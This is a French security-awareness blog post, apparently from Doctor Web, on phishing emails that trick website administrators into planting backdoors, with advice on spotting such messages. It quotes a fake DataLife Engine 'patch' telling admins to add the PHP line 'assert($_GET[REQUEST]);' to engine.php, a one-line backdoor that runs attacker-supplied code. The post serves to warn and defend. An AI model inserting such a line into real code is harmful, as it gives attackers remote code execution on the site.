-
Ajouter aux favoris
Phishing ciblant les administrateurs
mercredi 28 février 2018
Les phishers aiment parvenir à cibler les collaborateurs ayant des responsabilités dans l’entreprise parce qu’ils reçoivent beaucoup de courriels et ne les lisent pas toujours attentivement. Mais cela ne signifie pas que les autres catégories de personnel ne les intéressent pas. Voici un message qui s’adresse aux administrateurs de notre produit Dr.Web AV-Desk et qui demande confirmation du fait que le nom de domaine av-desk.ru est géré par une personne qui est indiquée comme administrateur du site. Pour cela, le message demande la création d’un fichier spécifique etc…
Dans un premier temps et en tant qu’éditeurs du service Internet AV-Desk, le fait d'avoir reçu un message sur des problèmes liés à un domaine ayant ce nom ne nous a pas étonné.
Mais regardons plus attentivement. Le message a été envoyé à l'adresse du service marketing. Il est évident que le service marketing n'a rien à voir avec les problèmes concernant la possession d'un site web. De plus, au lieu de demander des documents confirmant le droit de gérer le domaine, on nous demande de créer un fichier. Nous pourrions imaginer que ce sont des pirates qui ont détourné le site.
Comme toujours, on joue sur l’effet de surprise et surtout sur la hâte, on nous donne trois jours et pas une minute de plus. Le message a été reçu le 2 juin, donc, en théorie, nous devions tout faire en un jour.
Maintenant, allons vérifier les numéros de téléphone à l’aide d’une recherche standard : Il s'avère que les numéros de téléphone n'appartiennent à aucun des propriétaires du nom de domaine du site.
Il est à noter que ce mailing circule depuis un certain temps déjà sur Internet. Il est intéressant de noter que l'adresse de l'expéditeur est correcte. Mais les pirates comptent sur le fait que l'utilisateur va créer un fichier qui pourra être utilisé comme une backdoor. Lors de la consultation du fichier de ce site contenant assert, le code transmis dans les paramètres sera exécuté.
« J'ai vérifié que le message provenait du propriétaire du nom de domaine. J'ai commencé à exécuter la demande. Il m’a fallu dix minutes pour créer un fichier et le placer sur le site. J'ai hâte de répondre au message car si on ne trouve pas le fichier, je risque de perdre mon domaine. Je clique sur le bouton Répondre de mon client de messagerie, et dans le message, je signale que les travaux nécessaires pour placer ce fichier sur le site ont été terminés. J'envoie le message.
Si vous pensez qu'à ce moment-là, j'ai compris que le message avait été envoyé par un malfaiteur, vous vous trompez. Je vous ai déjà expliqué que j'ai bien vérifié que le message provenait du propriétaire du nom de domaine.
Nous n'avons pas répondu à ce message. Malheureusement, tous les internautes n'agissent pas de cette manière.
L'utilisateur n'a pas beaucoup à faire : il doit seulement créer un répertoire, puis un fichier, et écrire une seule ligne dans ce fichier.
La ruse est que l'utilisateur est invité à créer un fichier ayant un code php pouvant paraître inoffensif à première vue. Toutefois, si nous examinons attentivement une description de la fonction assert, il nous devient immédiatement clair que les criminels vont tout simplement exécuter un code dont ils ont besoin.
J'ai décidé de supprimer le fichier de mon site.
Et puis j'ai reçu une réponse au message que j'avais envoyé en réponse à la demande de placer le fichier sur mon site.
Voici une citation :
Bonjour Madame, Monsieur,
Le message que vous avez reçu est frauduleux et n'a rien à voir avec R01.
Nous vous ne recommandons pas d'insérer ce code car il donnerait aux malfaiteurs la possibilité de manipuler le contenu de votre site. Si le code a déjà été publié, nous vous recommandons de vérifier que votre site n’embarque pas un code malveillant et/ou de restaurer l'état de votre site à partir d'une copie de sauvegarde.
Cordialement,
Il existe d'autres techniques de phishing ciblant les admins.
Nous vous informons que nos experts ont détecté sur votre site une vulnérabilité critique qui permet aux pirates d’accéder à la base de données de votre site car le filtrage de données n'est pas suffisant.
Selon nos données, 60 % des sites utilisant " DataLife Engine " sont vulnérables et sujets au piratage exploitant cette vulnérabilité. C'est pourquoi nous avons décidé de faire ce mailing à l'attention des administrateurs de sites vulnérables afin qu'ils puissent réagir et protéger rapidement leurs sites contre l'activité des malfaiteurs.
Pour corriger la vulnérabilité, avec un éditeur de texte, ouvrez le fichier de votre site : /engine/engine.php et, au début du fichier, après la ligne :
ajoutez :
assert($_GET[REQUEST]);
Le projet Lumières sur la sécurité recommande
Lorsque vous lisez des messages entrants, soyez toujours très attentifs. Une grande majorité des messages de phishing peuvent être rejetés en utilisant une pure logique et pour des raisons formelles : l’absence d’un expéditeur connu, si le message n'est pas adressé d'une manière personnelle et enfin s'il n'y a pas d'adresse de réponse à la fin. Dans le cas contraire, vous risquez d'envoyer de l’argent aux criminels, ou (comme dans le cas mentionné ici) de leur ouvrir la porte vous-mêmes.
Mais surtout, n'oubliez pas que l'utilisation d'un antispam pourra vous protéger non seulement contre le spam et le phishing mais également contre les ransomwares à chiffrement.
![[Twitter]](http://st.drweb.com/static/new-www/social/no_radius/twitter.png "Partagés 1 fois")
Nous apprécions vos commentaires
Pour laisser un commentaire, vous devez accéder au site via votre compte sur le site de Doctor Web. Si vous n'avez pas de compte, vous pouvez le créer.
Commentaires des utilisateurs
vasvet
15:24:46 2018-08-26
razgen
02:40:31 2018-08-21
Неуёмный Обыватель
20:22:30 2018-07-17
Bernard
00:24:28 2018-03-01